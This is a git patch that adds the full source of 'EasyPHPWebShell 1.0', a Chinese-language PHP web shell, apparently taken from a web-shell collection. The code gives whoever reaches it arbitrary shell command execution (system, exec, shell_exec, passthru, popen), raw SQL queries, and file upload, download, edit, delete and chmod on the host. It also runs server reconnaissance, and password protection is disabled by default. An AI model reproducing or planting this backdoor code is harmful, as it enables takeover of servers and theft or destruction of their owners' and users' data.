From ce1ff683a3f5cc72f7b11008e1cfdb2ede6b03c0 Mon Sep 17 00:00:00 2001
From: tennc <tennc@users.noreply.github.com>
Date: Mon, 8 Jun 2015 11:53:44 +0800
Subject: [PATCH] Create xw.php

---
 php/xw.php | 674 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 674 insertions(+)
 create mode 100644 php/xw.php
diff --git a/php/xw.php b/php/xw.php
new file mode 100644
index 0000000..e1b4511
--- /dev/null
+++ b/php/xw.php
@@ -0,0 +1,674 @@
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>EasyPHPWebShell(S8S8测试版)</title>
+    <style type="text/css">
+    <!--
+    body,td,th, h1, h2 {
+        font-size: 12px;
+        font-family: sans-serif;
+    }
+    body {background-color: #F8F8F8;}
+    .style1 { 
+        font-size: 12px;
+        font-family: verdana, helvetica, sans-serif, 宋体;
+        vertical-align: middle;
+        border: 1px solid #000000; 
+    }
+    .stylebtext2 {color: #990000;font-weight: bold;}
+    .stylebtext3 {color: #FFFFFF;font-weight: bold;}
+     a:link,a:visited,a:active {color:#336699; text-decoration: underline;} 
+     a:hover {COLOR: #990000;text-decoration: none;}
+    table {border-collapse: collapse;}
+    td, th { border: 1px solid #000000;}
+    -->
+</style>
+
+<?php
+@set_time_limit(0);
+@error_reporting(E_ERROR | E_WARNING | E_PARSE);
+@ob_start();
+$pagestarttime = microtime();
+
+if (get_magic_quotes_gpc()) {
+    $_GET = array_stripslashes($_GET);
+    $_POST = array_stripslashes($_POST);
+}
+
+/////参数设置
+
+$chkpassword = 0;//是否有密码验证
+
+$my_password = "5065338";//设置密码,如果chkpassword为0,此处设置无效.
+
+$cookit_time = 24;//设置cookie有效时间(单位:小时,注:一天24小时)
+
+//////结束
+
+?>
+
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>EasyPHPWebShell(S8S8测试版)</title>
+    <style type="text/css">
+    <!--
+    body,td,th, h1, h2 {
+        font-size: 12px;
+        font-family: sans-serif;
+    }
+    body {background-color: #F8F8F8;}
+    .style1 { 
+        font-size: 12px;
+        font-family: verdana, helvetica, sans-serif, 宋体;
+        vertical-align: middle;
+        border: 1px solid #000000; 
+    }
+    .stylebtext2 {color: #990000;font-weight: bold;}
+    .stylebtext3 {color: #FFFFFF;font-weight: bold;}
+     a:link,a:visited,a:active {color:#336699; text-decoration: underline;} 
+     a:hover {COLOR: #990000;text-decoration: none;}
+    table {border-collapse: collapse;}
+    td, th { border: 1px solid #000000;}
+    -->
+</style>
+
+<?
+
+if($chkpassword == 1){
+	@session_start();
+	if ($_GET["action"] == "logout") {
+		@session_unregister("smy_password");
+		@session_destroy();
+		@setcookie ("cmy_password","");
+		echo "<script>function redirect(){window.location.replace(\"{$_SERVER['PHP_SELF']}\");}redirect();</script>";
+	}
+	if($_GET["action"] == "login"){
+		if($my_password==$_POST["pmy_password"]){
+			@session_register("smy_password");
+			$_SESSION["smy_password"] = $my_password;
+			@setcookie ("cmy_password",$my_password,time()+(3600*$cookit_time));
+			echo "<script>function redirect(){window.location.replace(\"{$_SERVER['PHP_SELF']}\");}redirect();</script>";
+		}
+	}
+	if (@session_is_registered("smy_password")||isset($_COOKIE["cmy_password"])){
+		if (($_SESSION["smy_password"]!=$my_password)&&(!isset($_COOKIE["cmy_password"])||$_COOKIE["cmy_password"]!=$my_password))
+			getloginpass();
+	}else getloginpass();
+}
+
+if(!@get_cfg_var("register_globals")){
+    foreach($_GET as $key => $val) $$key = $val;
+    foreach($_POST as $key => $val) $$key = $val;
+	foreach($_FILES as $key => $val) $$key = $val;
+}
+
+if(isset($df_path)){
+    if (!file_exists($df_path)) $errordownload = "没找到文件"; 
+    else {
+        $df_name = basename($df_path);
+        $df_fhd=fopen($df_path,"rb");
+        if($df_fhd==false) $errordownload = "打开文件错误";
+        else{
+            Header("Content-type: application/octet-stream");
+            Header("Accept-Ranges: bytes");
+            Header("Accept-Length: ".filesize($df_path));
+            Header("Content-Disposition: attachment; filename=".$df_name);
+            echo fread($df_fhd,filesize($df_path));
+            fclose($df_fhd);
+            exit;
+        }
+    } 
+}
+
+if(isset($gotodir)) if($gotodir != "") $dir=$gotodir;
+
+if(!isset($action)) {
+    $action = "dir";
+    $dir = ".";
+}
+
+if(!isset($dir)) $dir = ".";
+
+$rootdir = str_replace("\\\\","/",$_SERVER["DOCUMENT_ROOT"]);
+
+if(isset($abspath)) $dir = gettruepath($dir);
+else if(isset($unabspath)){
+    $dir = gettruepath($dir);
+    if(strstr($dir,$rootdir)) $dir = str_replace("$rootdir",".",$dir);  
+    else $dir=".";
+}
+$rny="<font color=green><b>■</b></font>";$rnn="<font color=red><b>■</b></font>";
+
+?>
+
+<SCRIPT LANGUAGE="JavaScript">
+function rusuredel(msg,url){
+    smsg = "确实要删除文件(目录)[" + msg + "]吗?";
+    if (confirm(smsg)){
+        url = url + msg;
+        window.location = url;
+    } 
+}
+
+function rusurechk(msg,url){
+    smsg = "源文件(目录,属性)为[" + msg + "],请输入目标文件(目录,属性):";
+    re = prompt(smsg,msg);
+    if (re){
+        url = url + re;
+        window.location = url;
+    }
+}
+</script>
+</head>
+<body>
+
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+    <tr>
+        <td align="center" width="100%" bgcolor="#000000" class="stylebtext3">
+            欢迎使用EasyPHPWebShell 1.0(S8S8测试版)【切莫用于任何非法途径否则后果自负】
+        </td>
+    </tr>
+    <tr>
+        <td align="center" bgcolor="#EEEEEE">
+            本文件绝对路径:<? $stmp =str_replace("\\","/", __FILE__);echo "【<a href=\"$HTTP_SERVER_VARS[PHP_SELF]\">$stmp</a>】";?>【<a href="?action=logout">点此注销会话</a>】
+        </td>
+    </tr>
+    <tr>
+        <td align="center"  bgcolor="#EEEEEE">【<a href="?action=dir&dir=.">文件管理</a>】【<a href="?action=editfile&dir=<?=urlencode($dir);?>&editfile=<?=urlencode($dir);?>/">文本编辑器</a>】【<a href="?action=sql">数据库查询</a>】【<a href="?action=shell">Shell命令</a>】【<a href="?action=env">环境变量</a>】【<a href="?action=phpinfo">PHP系统信息</a>】【<a href="http://www.s8s8.net/forums/index.php?showtopic=15998">查看更新</a>】
+        </td>
+    </tr>
+</table>
+<br>
+<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr>
+		<td width="100%" bgcolor="#000000" align="center" class="stylebtext3">
+<?if($action == "dir"){?>
+	文件管理
+	</td>
+	</tr>
+
+	<tr>
+	<form method="post" action="?action=dir&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
+	<td bgcolor="#EEEEEE">&nbsp;当前目录:&nbsp;
+	<input name="gotodir" type="text" class="style1" value="<?=$dir?>" size="60">&nbsp;
+	<input name="gotodirb" type="submit" class="style1" value="跳转"><?if($dir[1] == ':') echo "【<a href=\"?action=dir&dir=".urlencode($dir)."&unabspath=1\">点此用<b>相对</b>路径查看</a>】&nbsp;";else echo "【<a href=\"?action=dir&dir=".urlencode($dir)."&abspath=1\">点此用<b>绝对</b>路径查看</a>】&nbsp;";?>
+	</td>
+	</form>
+	</tr>
+
+	<tr>
+	<form method="post" action="?action=fileup&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
+	<td bgcolor="#EEEEEE">&nbsp;文件上传到(目录):
+	<input name="filedir" type="text" class="style1" value="<?=$dir?>" size="30">&nbsp;本地文件:
+	<input name="userfile" type="file" class="style1" size="30">&nbsp;
+	<input name="userfileb" type="submit" class="style1" value="上传">
+	</td>
+	</form>
+	</tr>
+
+	<tr>
+	<form method="post" action="?action=filecreate&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
+	<td bgcolor="#EEEEEE">&nbsp;新建文件(目录)在当前目录:&nbsp; 
+	<input name="mkname" type="text" value="" size=30 class="style1">&nbsp;
+	<input name="mkfileb" type="submit" value="新建文件" class="style1">&nbsp;
+	<input name="mkdirb" type="submit" value="新建目录" class="style1">&nbsp;当前目录状态:【<b><?$write = "不可写";if(is_dir($dir)) {if ($fp = @fopen("$dir/temp.tmp", 'w')) {@fclose($fp);@unlink("$dir/temp.tmp");$write = "可写";}}echo "$write</b>】";?>
+	</td>
+	</tr>
+	</table>
+
+	<table width="100%" border="0" cellpadding="0" cellspacing="0">
+	<tr bgcolor="#000000" class="stylebtext3">
+		<td width="25%">文件名</td>
+		<td width="40%">建立时间|最后修改时间</td>
+		<td width="10%">大小(KB)</td>
+		<td width="8%">属性</td>
+		<td width="17%">操作</td>
+	</tr>
+	<?php
+	$filesum=0;$dirsum=0;$color="#EEEEEE";
+	$dirs=@opendir($dir);
+	while ($lop_fname=@readdir($dirs)){
+		if(@is_dir("$dir/$lop_fname")){
+			$lop_fsize = "-";
+			$lop_fcdata = "-";
+			$lop_fmdata = "-";
+			$lop_foper="-";
+			$lop_ftype="-";
+			if($lop_fname==".."){
+				if($dir == ".") continue;
+				$dirb=@dirname($dir);
+				if($dir[1] ==':'){
+					$dirb = gettruepath($dirb);
+					if(strlen($dirb) <=3) $dirb = substr($dirb,0,2);
+				}
+				$bp="△ ";
+				$lop_fname = "上级目录";
+			}else if($lop_fname=="."){
+				if($dir == ".") continue;
+				$dir[1] ==':'?$dirb = substr(gettruepath($dirb),0,2):$dirb=$lop_fname;
+				$bp="○ ";
+				$lop_fname = "根级目录";
+			}else{
+				$lop_fsize = "[DIR]";
+				$dirb="$dir/$lop_fname";    
+				$lop_fcdata = @date("Y-n-d H:i:s",@filectime("$dirb"));
+				$lop_fmdata = @date("Y-n-d H:i:s",@filemtime("$dirb"));
+				$lop_ftype= substr(@base_convert(@fileperms($dirb),10,8),-4);
+				$bp="□ ";
+				$title = "点击进入文件夹[$lop_fname]";
+				$lop_foper= "[<a href=\"删除\" title=\"删除整个文件夹\" onClick=\"rusuredel('$dirb','?action=filedel&dir=$dir&deldir=');return false;\">删</a>|".
+							"<a href=\"重命名\" title=\"重命名\" onClick=\"rusurechk('$dirb','?action=filerename&dir=$dir&renamef=$dirb&renamet=');return false;\">重</a>|".
+							"<a href=\"拷贝\" title=\"拷贝\" onClick=\"rusurechk('$dirb','?action=filecopy&dir=$dir&copydirf=$dirb&copydirt=');return false;\">拷</a>|".
+							"<a href=\"属性\" title=\"修改属性\" onClick=\"rusurechk('$lop_ftype','?action=filetype&dir=$dir&ctype=');return false;\">属</a>]";
+				$dirsum++;
+			}
+			$color=ch_color($color);
+			echo    "<tr bgcolor=\"$color\">". 
+							"<td width=\"25%\">$bp [<a href=\"?action=dir&dir=$dirb\" title = \"进入\">$lop_fname</a>]</td>".
+							"<td width=\"40%\">[$lop_fcdata|$lop_fmdata]</td>".
+							"<td width=\"10%\">$lop_fsize</td>".
+							"<td width=\"8%\">$lop_ftype</td>".
+							"<td width=\"17%\">$lop_foper</td>".
+						"</tr>";
+		}
+	}
+	@closedir($dirs);
+	$dirs=@opendir($dir);
+	while ($lop_fname=@readdir($dirs)){
+		if(!@is_dir("$dir/$lop_fname")&&$lop_fname!=".."){
+			$lop_ftype= substr(@base_convert(@fileperms("$dir/$lop_fname"),10,8),-4);
+			$lop_foper= "[<a href=\"删除\" title=\"删除\" onClick=\"rusuredel('$dir/$lop_fname','?action=filedel&dir=$dir&delfile=');return false;\">删</a>|".
+						"<a href=\"重命名\" title=\"重命名\"  onClick=\"rusurechk('$dir/$lop_fname','?action=filerename&dir=$dir&renamef=$dir/$lop_fname&renamet=');return false;\">重</a>|".
+						"<a href=\"拷贝\" title=\"拷贝\" onClick=\"rusurechk('$dir/$lop_fname','?action=filecopy&dir=$dir&copyfilef=$dir/$lop_fname&copyfilet=');return false;\">拷</a>|".
+						"<a href=\"属性\" title=\"修改属性\" onClick=\"rusurechk('$lop_ftype','?action=filetype&dir=$dir&cfile=$dir/$lop_fname&ctype=');return false;\">属</a>|".
+						"<a href=\"?action=dir&df_path=$dir/$lop_fname\" title=\"下载\">下</a>|".
+						"<a href=\"?action=editfile&dir=$dir&editfile=$dir/$lop_fname\" title=\"编辑\">编</a>]";
+			$color=ch_color($color);
+			echo    "<tr bgcolor=\"$color\">". 
+							"<td width=\"25%\">■ <a href=\"$dir/$lop_fname\" title = \"新窗口中打开\" target=\"_blank\">$lop_fname</a></td>".
+							"<td width=\"40%\">[".@date("Y-n-d H:i:s",@filectime("$dir/$lop_fname"))."|".@date("Y-n-d H:i:s",@filemtime("$dir/$lop_fname"))."]</td>".
+							"<td width=\"10%\">".@number_format(@filesize("$dir/$lop_fname")/1024,3)."</td>".
+							"<td width=\"8%\">".$lop_ftype."</td>".
+							"<td width=\"17%\">$lop_foper</td>".
+						"</tr>";
+			$filesum++;
+		}
+	}
+	@closedir($dirs);
+	?>										  
+	<tr bgcolor="#000000" class="stylebtext3" align="center">
+		<td width="25%" colspan="5">目录数:<?=$dirsum?>,文件数:<?=$filesum?></td>
+	</tr>
+	</table>      
+<?}else if ($action == "editfile"){?>
+	文本编辑器(若目标文件不存在将新建新文件)
+	</td>
+	</tr>
+
+	<tr>
+	<form method="post" action="?action=filesave&dir=<?=urlencode($dir);?>" enctype="multipart/form-data">
+		<td align="center" valign="top" bgcolor="#EEEEEE">当前编辑文件名:
+			<input name="editfilename" type="text" class="style1" value="<?=$editfile?>" size="30">
+			<input name="editbackfile" type="checkbox" value="1" class="style1">生成备份文件(原文件.bak)<br>
+			<textarea name="editfiletext" cols="120" rows="25" class="style1"><?
+				$fd = @fopen($editfile, "rb");
+				$fd==false?$readfbuff = "读取文件错误(或尚未读取文件).":$readfbuff = @fread($fd, filesize($editfile));
+				@fclose( $fd );
+				$readfbuff = htmlspecialchars($readfbuff);
+				echo "$readfbuff";
+			?></textarea><p>
+			<input name="editfileb" type="submit" value="提交" class="style1">&nbsp;&nbsp;
+			<input name="editagainb" type="reset" value="重置" class="style1">
+			<a href="?action=dir&dir=<?=urlencode($dir);?>">点此返回文件浏览页面</a>
+			<p>
+		</td>
+	</form>
+	</tr>
+	</table>
+<?}else if("sql" == substr($action,0,3)){?>
+	数据库查询
+	</td>
+	</tr>
+	
+	<tr>
+	<form method="post" action="?action=sql" enctype="multipart/form-data">
+		<td align="center" valign="top" bgcolor="#EEEEEE">
+			数据库地址:<input name="sqlhost" type="text" class="style1" value="<?=isset($sqlhost)?$sqlhost:"localhost"?>" size="20">
+			端口:<input name="sqlport" type="text" class="style1" value="<?=isset($sqlport)?$sqlport:"3306"?>" size="5">
+			用户名:<input name="sqluser" type="text" class="style1" value="<?=isset($sqluser)?$sqluser:"root"?>" size="10">
+			密码:<input name="sqlpasd" type="text" class="style1" value="<?=isset($sqlpasd)?$sqlpasd:""?>" size="10">
+			数据库名:<input name="sqldb" type="text" class="style1" value="<?=isset($sqldb)?$sqldb:""?>" size="10"><br>
+			<textarea name="sqlcmdtext" cols="120" rows="10" class="style1"><?
+				if(!empty($sqlcmdtext)){
+					@mysql_connect("{$sqlhost}:{$sqlport}","$sqluser","$sqlpasd") or die("数据库连接失败");
+					@mysql_select_db("$sqldb") or die("选择数据库失败");
+					$res = @mysql_query("$sqlcmdtext");
+					echo $sqlcmdtext;
+					mysql_close();
+				}
+			?></textarea><p>
+			<span class="stylebtext2"><?echo isset($sqlcmdb)?($res?"执行成功.":"执行失败:".mysql_error()):"";?></span><p>
+			<input name="sqlcmdb" type="submit" value="执行" class="style1">&nbsp;&nbsp;
+			<input name="sqlagainb" type="reset" value="重置" class="style1">
+			<p>
+		</td>
+	</form>
+	</tr>
+	</table>
+<?}else if("shell" == substr($action,0,5)){?>
+	Shell命令
+	</td>
+	</tr>
+
+	<tr>
+		<form method="post" action="?action=shell" enctype="multipart/form-data">
+		<td align="center" valign="top" bgcolor="#EEEEEE">
+			函数:<select name="seletefunc" class="input">
+				<option value="system" <?=($seletefunc=="system")?"selected":"";?>>system</option>
+				<option value="exec" <?=($seletefunc=="exec")?"selected":"";?>>exec</option>
+				<option value="shell_exec" <?=($seletefunc=="shell_exec")?"selected":"";?>>shell_exec</option>
+				<option value="passthru" <?=($seletefunc=="passthru")?"selected":"";?>>passthru</option>
+				<option value="popen" <?=($seletefunc=="popen")?"selected":"";?>>popen</option>
+			</select>
+			命令:<input name="shellcmd" type="text" class="style1" value="<?=isset($shellcmd)?$shellcmd:""?>" size="80">
+			<textarea name="shelltext" cols="120" rows="10" class="style1"><?
+				if(!empty($shellcmd)){
+					if($seletefunc=="popen"){
+						$pp = popen($shellcmd, 'r');
+						echo fread($pp, 2096);
+						pclose($pp);
+					}else{
+						echo $out =  ("system"==$seletefunc)?system($shellcmd):(($seletefunc=="exec")?exec($shellcmd):(($seletefunc=="shell_exec")?shell_exec($shellcmd):(($seletefunc=="passthru")?passthru($shellcmd):system($shellcmd))));	
+					}
+				}
+			?></textarea><p>
+			<span class="stylebtext2"><?echo get_cfg_var("safe_mode")?"提示:安全模式下可能无法执行":"";?></span><p>
+			<input name="shellcmdb" type="submit" value="执行" class="style1">&nbsp;&nbsp;
+			<input name="shellagainb" type="reset" value="重置" class="style1">
+			<p>
+	</td>
+	</form>
+	</tr>
+	</table>
+<?}else if($action=="phpinfo"){?>
+	PHP系统信息
+	</td>
+	</tr>
+
+	<tr>
+	<td align="center" bgcolor="#EEEEEE" class="stylebtext2"><br><?phpinfo();
+		if(eregi("phpinfo",get_cfg_var("disable_functions"))) echo "<b>phpinfo函数被禁止</b><br>";
+	?><br>
+	</td>
+	</tr>
+	</table>
+<?}else if("file" == substr($action,0,4)){?>
+	系统消息
+	</td>
+	</tr>
+
+	<tr>
+	<td align="center" bgcolor="#EEEEEE" class="stylebtext2">
+	<br>
+	<?
+		if($action == "filesave"){
+			if(isset($editfileb)&&isset($editfilename)){
+				if(isset($editbackfile)&&($editbackfile == 1)) 
+					echo $out = @copy($editfilename,$editfilename.".bak")?"生成备份文件成功.<p>":"生成备份文件成功<p>";
+				$fd = @fopen($editfilename, "w");
+				if($fd == false) echo "打开文件[$editfilename]错误.";
+				else{
+					echo $out=@fwrite($fd,$editfiletext)?"编辑文件[$editfilename]成功!":"写入文件文件[$editfilename]错误";
+					@fclose( $fd );
+				}
+			}
+		}else if($action == "filedel"){
+			if(isset($deldir)) {
+				echo $out = file_exists($deldir)?(deltree($deldir)?"删除目录[$deldir]成功!":"删除目录[$deldir]失败!"):"目录[$deldir]不存在!!";
+			}else if(isset($delfile)){
+				@chmod("$delfile", 0777);
+				echo $out = file_exists($delfile)?(@unlink($delfile)?"删除文件[$delfile]成功!":"删除文件[$delfile]失败!"):"文件[$delfile]不存在!";
+			}
+		}else if($action == "filerename"){
+			echo $out = file_exists($renamef)?(@rename($renamef,$renamet)?"重命名[$renamef]为[{$renamet}]成功":"重命名[$renamef]为[{$renamet}]失败"):"文件[$renamef]不存在!";
+		}else if($action =="filecopy") {
+			if(isset($copydirf)&&isset($copydirt)){
+				echo $out = file_exists($copydirf)?(truepath($copydirt)?(copydir($copydirf,$copydirt)?"拷贝目录[$copydirf]到[$copydirt]成功":"拷贝目录[$copydirf]到[$copydirt]失败"):"目标目录[$copydirt]不存在且创建错误"):"目录[$copydirf]不存在!";
+			}else if(isset($copyfilef)&&isset($copyfilet)){
+				echo $out = file_exists($copyfilef)?(truepath(dirname($copyfilet))?(@copy($copyfilef,$copyfilet)?"拷贝文件[$copyfilef]到[$copyfilet]成功":"拷贝文件[$copyfilef]到[$copyfilet]失败"):"目标目录不存在且创建错误"):"源文件[$copyfilef]不存在!";
+			}
+		}else if($action == "filecreate"){
+			if(isset($mkdirb)){
+				echo $out = file_exists("$dir/$mkname")?"[{$dir}/{$mkname}]该目录已存在":(@mkdir("$dir/$mkname",0777)?"目录[$mkname]创建成功":"目录[$mkname]创建失败");
+			}else if(isset($mkfileb)){
+				if(file_exists("$dir/$mkname")) echo "[$dir/$mkname]该文件已存在";
+				else{
+					$fd = @fopen("$dir/$mkname", "w");
+					if($fd == false) echo "建立文件[$mkname]错误.";
+					else{
+						echo "建立文件[$mkname]成功 <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($dir)."/".urlencode($mkname)."\"><p>点此跳转入编辑浏览页面</a>";
+						@fclose( $fd );
+					}
+				}
+			}
+		}else if($action == "filetype"){
+			echo $out=@chmod($cfile,base_convert($ctype,8,10))?"更改成功!":"更改失败!";
+		}else if($action == "fileup"){
+			echo  $out = @copy($userfile["tmp_name"],"{$filedir}/{$userfile['name']}")?"上传文件[{$userfile['name']}]成功.位置:[{$filedir}/{$userfile['name']}]共({$userfile['size']})字节.":"上传文件[{$userfile['name']}]失败";
+		}else{
+			echo "错误的提交参数action.";
+		}
+	?>
+	<p>
+	<a href="?action=dir&dir=<?=urlencode($dir);?>">点此返回文件浏览页面</a>
+	<p>
+	</td>
+	</tr>
+	</table>
+
+<?}else if($action=="env"){?>
+	环境变量&nbsp;&nbsp;<?=$rny?>支持&nbsp;&nbsp;<?=$rnn?>不支持<br>
+	</td>
+	</tr>
+	<?
+	$sinfo[0] = array("主机域名:",$_SERVER["SERVER_NAME"]);
+	$sinfo[1] = array("主机IP:",gethostbyname($_SERVER["SERVER_NAME"]));
+	$sinfo[2] = array("主机端口:",$_SERVER["SERVER_PORT"]);
+	$sinfo[3] = array("主机时间:",date("Y/m/d_h:i:s",time()));
+	$sinfo[4] = array("主机系统:",PHP_OS);
+	$sinfo[5] = array("主机WEB服务器",$_SERVER["SERVER_SOFTWARE"]);
+	$sinfo[6] = array("PHP版本:",PHP_VERSION);
+	$sinfo[7] = array("剩余空间:",intval(diskfreespace(".") / (1024 * 1024).'MB'));
+	$sinfo[8] = array("主机语言",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
+	$sinfo[9] = array("当前用户",get_current_user());
+	$sinfo[10] = array("最大内存占用:",my_func("memory_limit",1));
+	$sinfo[11] = array("最大单个上传文件",my_func("upload_max_filesize",1));
+	$sinfo[12] = array("POST最大容量",my_func("post_max_size",1));
+	$sinfo[13] = array("脚本超时",my_func("max_execution_time",1));
+	$sinfo[14] = array("屏蔽的函数",my_func("disable_functions",1));
+
+	$ssql[0] = array("MYSQL",my_func("mysql_close",2)); 
+	$ssql[1] = array("Oracle",my_func("ora_close",2)); 
+	$ssql[2] = array("Oracle 8",my_func("OCILogOff",2)); 
+	$ssql[3] = array("OBDC",my_func("odbc_close",2)); 
+	$ssql[4] = array("SyBase",my_func("sybase_close",2)); 
+	$ssql[5] = array("SQL_Server",my_func("mssql_close",2)); 
+	$ssql[6] = array("DBase",my_func("dbase_close",2)); 
+	$ssql[7] = array("Hyperwave",my_func("hw_close",2));
+	$ssql[8] = array("Postgre_SQL",my_func("pg_close",2));
+
+	$sobj[0] = array("Session支持",my_func("session_start",2));
+	$sobj[1] = array("Socket支持",my_func("fsockopen",2));
+	$sobj[2] = array("压缩文件支持(Zlib)",my_func("gzclose",2));
+	$sobj[3] = array("SMTP支持",my_func("smtp",2));
+	$sobj[4] = array("XML支持",my_func("XML Support",3));
+	$sobj[5] = array("FTP支持",my_func("FTP support",3));
+	$sobj[6] = array("Sendmail支持",my_func("Internal Sendmail Support for Windows 4",3));
+	$sobj[7] = array("SNMP支持",my_func("snmpget",2));
+	$sobj[8] = array("PDF文档支持",my_func("pdf_close",2));
+	$sobj[9] = array("IMAP电子邮件支持",my_func("imap_close",2));
+	$sobj[10] = array("图形处理GD Library支持",my_func("imageline",2));
+	$sobj[11] = array("ZEND支持",my_func("zend_version",2)."(".zend_version().")");
+
+	$sobj[12] = array("允许使用URL打开文件",my_func("allow_url_fopen",2));
+	$sobj[13] = array("PREL相容语法 PCRE",my_func("preg_match",2));
+	$sobj[14] = array("显示错误信息",my_func("display_errors",2));
+	$sobj[15] = array("自动定义全局变量",my_func("register_globals",2));
+	$sobj[16] = array("PHP运行方式",strtoupper(php_sapi_name()));
+	?>
+
+	<tr>
+	<td align="center" bgcolor="#EEEEEE">
+		<table width="600" border="0" cellpadding="0" cellspacing="0"><br>
+			<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">主机信息</td></tr>
+			<?
+			for($i=0;$i<15;$i++){
+				$color=ch_color($color);
+				echo "<tr bgcolor=\"$color\"><td>{$sinfo[$i][0]}</td><td>{$sinfo[$i][1]}</td></tr>";		
+			}
+			?>
+			<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">数据库支持信息</td></tr>
+			<?
+			for($i=0;$i<9;$i++){
+				$color=ch_color($color);
+				echo "<tr bgcolor=\"$color\"><td>{$ssql[$i][0]}</td><td>{$ssql[$i][1]}</td></tr>";		
+			}
+			?>
+			<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">组件和其他信息</td></tr>
+			<?
+			for($i=0;$i<17;$i++){
+				$color=ch_color($color);
+				echo "<tr bgcolor=\"$color\"><td>{$sobj[$i][0]}</td><td>{$sobj[$i][1]}</td></tr>";
+			}
+			?>
+			<tr><td align="center" bgcolor="#000000" class="stylebtext3" colspan="2">自定义查看PHP配置参数(多个参数可用","逗号隔开)</td></tr>
+			<tr bgcolor="#EEEEEE">
+			<form method="post" action="?action=env" enctype="multipart/form-data">
+				<td colspan="2">请输入参数的ProgId或ClassId:
+					<input name="envname" type="text" size="50" class="style1" value=<?=isset($envname)?$envname:"";?>> 
+					<input name="envnameb" type="submit" value="查看" class="style1">
+				</td>
+			</form>
+			</tr>
+			<?
+				if(isset($envname)&&!empty($envname)){
+					$envname=explode(",", $envname);
+					$i=0;
+					while($envname[$i]){
+						echo "<tr bgcolor=\"#CCCCCC\"><td colspan=\"2\">查询[{$envname[$i]}]如下:</td></tr>";
+						echo "<tr bgcolor=\"#EEEEEE\"><td>Get_cfg_var方式</td><td>". my_func($envname[$i],1)."</td></tr>";
+						echo "<tr bgcolor=\"#EEEEEE\"><td>function_exists方式</td><td>". my_func($envname[$i],2)."</td></tr>";
+						echo "<tr bgcolor=\"#EEEEEE\"><td>Get_magic_quotes_gpc方式</td><td>". my_func($envname[$i],3)."</td></tr>";
+						echo "<tr bgcolor=\"#EEEEEE\"><td>Get_magic_quotes_runtime方式</td><td>". my_func($envname[$i],4)."</td></tr>";
+						echo "<tr bgcolor=\"#EEEEEE\"><td>Getenv方式</td><td>". my_func($envname[$i],5)."</td></tr>";	
+						$i++;
+					}
+				}
+			?>
+		</table><br>
+	</td>
+	</tr>
+	</table>
+<?}else{
+	echo "错误的提交参数</td></tr><tr><td align=\"center\" bgcolor=\"#EEEEEE\"><br><a href=\"?action=dir&dir=".urlencode($dir)."\">点此返回文件浏览页面</a><p></td></tr></table>";
+}echoend();@ob_end_flush();?>
+
+<?
+
+function array_stripslashes(&$array) {
+    while(list($key,$var) = each($array)) {
+        if ((strtoupper($key) != $key || ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv') {
+            if (is_string($var)) $array[$key] = stripslashes($var);
+            if (is_array($var)) $array[$key] = array_stripslashes($var);  
+        }
+    }
+    return $array;
+}
+
+function deltree($TagDir){ 
+	$mydir=@opendir($TagDir); 
+	while($file=@readdir($mydir)){ 
+		if((is_dir("$TagDir/$file")) && ($file!=".") && ($file!="..")) { 
+			if(!deltree("$TagDir/$file")) return false;
+		}else if(!is_dir("$TagDir/$file")){
+			@chmod("$TagDir/$file", 0777);
+			if(!@unlink("$TagDir/$file")) return false;
+		}
+	} 
+	@closedir($mydir); 
+	@chmod("$TagDir", 0777);
+	if(!@rmdir($TagDir)) return false;
+	return true;
+}
+
+function copydir($dirf,$dirt){
+    $mydir=@opendir($dirf);
+    while($file=@readdir($mydir)){
+        if((is_dir("$dirf/$file")) && ($file!=".") && ($file!="..")) {
+            if(!file_exists("$dirt/$file")) if(!@mkdir("$dirt/$file")) return false;
+            if(!copydir("$dirf/$file","$dirt/$file")) return false;
+        }else if(!is_dir("$dirf/$file")) if(!@copy("$dirf/$file","$dirt/$file")) return false;
+    }
+    return true;
+}
+
+function truepath($path){
+	if(file_exists($path)) return true;	
+	else{
+		if(truepath(@dirname($path))){
+			if(@mkdir($path)) return true;
+			else return false;
+		}else return false;
+	}
+}
+
+function getpageruntime(){
+    global $pagestarttime;
+    $pagestarttime = explode(' ', $pagestarttime);
+    $pageendtime = explode(' ',@microtime());
+    return ($pageendtime[0]-$pagestarttime[0]+$pageendtime[1]-$pagestarttime[1]);
+}
+
+function echoend(){
+    echo "<br><center>页面执行时间:".getpageruntime()." 秒<br>".
+    "<span class = \"stylebtext2\">EasyPHPWebShell 1.0(S8S8测试版)</span><br>脚本由 <b>网络技术论坛(<a href=\"http://www.s8s8.net\">http://www.s8s8.net</a>) ZV(<a href=\"mailto:zvrop@163.com\">zvrop@163.com</a>)</b> 编写<br>".
+    "Copyright (C) 2004 www.s8s8.net All Rights Reserved.</center>";
+}
+
+function gettruepath($path){
+    return str_replace("\\","/",@realpath($path));
+}
+
+function my_func($getname,$tp){
+	global $rny, $rnn;
+	$out = ($tp==1)?@get_cfg_var($getname):(($tp==2)?@function_exists($getname):(($tp==3)?@get_magic_quotes_gpc($getname):(($tp==4)?@get_magic_quotes_runtime($getname):(($tp==5)?@Getenv($getname):"error!"))));
+	return ($out == 1)?$rny:(($out == 0)?$rnn:$out);
+}
+
+function ch_color($c){
+	return $c=="#CCCCCC"?"#EEEEEE":"#CCCCCC";
+}
+
+function getloginpass(){
+	?>
+	<br><br><br><br><br><br><br>
+	<table align="center" width="300" border="0" cellpadding="0" cellspacing="0">
+    <tr>
+        <td align="center" bgcolor="#000000" class="stylebtext3">
+            欢迎使用,请输入密码
+        </td>
+    </tr>
+	<tr>
+		<form method="post" action="?action=login" enctype="multipart/form-data">
+        <td align="center" class="style1"><br>密码
+        <input name="pmy_password" type="password" size="30" class="style1"><p>
+		<input name="pmy_passwordb" type="submit" value="  登陆  " class="style1"><p>
+        </td>
+    </tr>
+	</table>
+	<?
+	exit;
+}
+?>

